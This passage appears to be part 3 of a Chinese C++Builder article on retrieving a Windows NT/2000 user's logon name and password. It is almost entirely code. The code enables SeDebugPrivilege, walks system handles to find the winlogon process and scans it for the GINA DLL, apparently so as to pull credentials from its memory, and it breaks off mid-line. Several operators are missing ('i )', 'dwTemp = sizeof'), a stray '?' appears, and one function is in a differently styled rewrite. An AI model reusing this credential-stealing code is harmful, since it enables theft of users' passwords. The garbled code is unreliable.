获取WinNT/Win2k当前用户名和密码(3)

2008-02-23 05:38:12来源:互联网 阅读 ()



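// Enables SeDebugPrivilege in the current process's access token.
//
// Returns TRUE only when the privilege is actually enabled afterwards.
// Returns FALSE when the process token cannot be opened, the privilege
// name cannot be resolved, the adjustment call fails, or the token does
// not hold the privilege at all.
//
// Security note: SeDebugPrivilege allows the caller to open processes
// regardless of their security descriptor, so it is normally granted to
// administrators only. A process that enables it shortly before opening
// a system process is a common signal for privilege-use auditing and
// endpoint monitoring.
BOOL AddDebugPrivilege(void)
{
    HANDLE Token = NULL;
    TOKEN_PRIVILEGES TokenPrivileges, PreviousState;
    DWORD ReturnLength = 0;
    BOOL Enabled = FALSE;

    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token))
    {
        return (FALSE);
    }

    if (LookupPrivilegeValue(NULL, "SeDebugPrivilege",
                             &TokenPrivileges.Privileges[0].Luid))
    {
        TokenPrivileges.PrivilegeCount = 1;
        TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        if (AdjustTokenPrivileges(Token, FALSE, &TokenPrivileges,
                                  sizeof (TOKEN_PRIVILEGES),
                                  &PreviousState, &ReturnLength))
        {
            // AdjustTokenPrivileges reports success even when the token
            // does not hold the privilege; in that case the last error is
            // ERROR_NOT_ALL_ASSIGNED, so only ERROR_SUCCESS means enabled.
            Enabled = (GetLastError() == ERROR_SUCCESS);
        }
    }

    // The original never closed the token handle, leaking it on every
    // call and on every path.
    CloseHandle(Token);
    return (Enabled);
}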
//---------------------------------------------------------------------------
// 本文是ccrun(老妖)的一个朋友提供的代码.有问题或建议请致信:info@ccrun.com
// 欢迎光临C++ Builder 研究 http://www.ccrun.com
//---------------------------------------------------------------------------
// Note that the following code eliminates the need
// for PSAPI.DLL as part of the executable.
DWORD FindWinLogon(void)
{
#define INITIAL_ALLOCATION 0x100
DWORD dwRc = 0;
DWORD dwSizeNeeded = 0;
PVOID pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION);
// Find how much memory is required.
pfnNtQuerySystemInformation(0x10, pvInfo, INITIAL_ALLOCATION, &dwSizeNeeded);
HeapFree(GetProcessHeap(), 0, pvInfo);
// Now, allocate the proper amount of memory.
pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSizeNeeded);
DWORD dwSizeWritten = dwSizeNeeded;
if(pfnNtQuerySystemInformation(0x10, pvInfo, dwSizeNeeded, &dwSizeWritten))
? {
HeapFree(GetProcessHeap(), 0, pvInfo);
return (0);
}
DWORD dwNumHandles = dwSizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);
if(dwNumHandles == 0)
{
// 本文转自 C Builder 研究 - http://www.ccrun.com/article.asp?i=612&d=1380t6
HeapFree(GetProcessHeap(), 0, pvInfo);
return (0);
}
PQUERY_SYSTEM_INFORMATION QuerySystemInformationP =
(PQUERY_SYSTEM_INFORMATION) pvInfo;
try
{
for(DWORD i=1; i<=dwNumHandles; i )
{
// "5" is the value of a kernel object type process.
if (QuerySystemInformationP->HandleType == 5)
{
PVOID pvDebugBuffer = pfnRtlCreateQueryDebugBuffer(0, 0);
if(pfnRtlQueryProcessDebugInformation
(QuerySystemInformationP->PID, 1, pvDebugBuffer) == 0)
{
PPROCESS_INFO_HEADER pihProcessInfoHeader =
(PPROCESS_INFO_HEADER)((DWORD)pvDebugBuffer 0x60);
DWORD dwCount = pihProcessInfoHeader->Count;
PPROCESS_INFO piProcessInfo = (PPROCESS_INFO)
((DWORD)pihProcessInfoHeader sizeof (PROCESS_INFO_HEADER));
// Form1->Memo1->Lines->Add(piProcessInfo->Name);
AnsiString strName = piProcessInfo->Name;
// if(strstr((char *)UpCase(*piProcessInfo->Name), "WINLOGON") != 0)
if(strName.UpperCase().Pos("WINLOGON") != 0)
{
DWORD dwTemp = (DWORD)piProcessInfo;
for (DWORD j=0; j<dwCount; j )
{
dwTemp = sizeof (PROCESS_INFO);
piProcessInfo = (PPROCESS_INFO)dwTemp;
strName = piProcessInfo->Name;
if(strName.UpperCase().Pos("NWGINA"
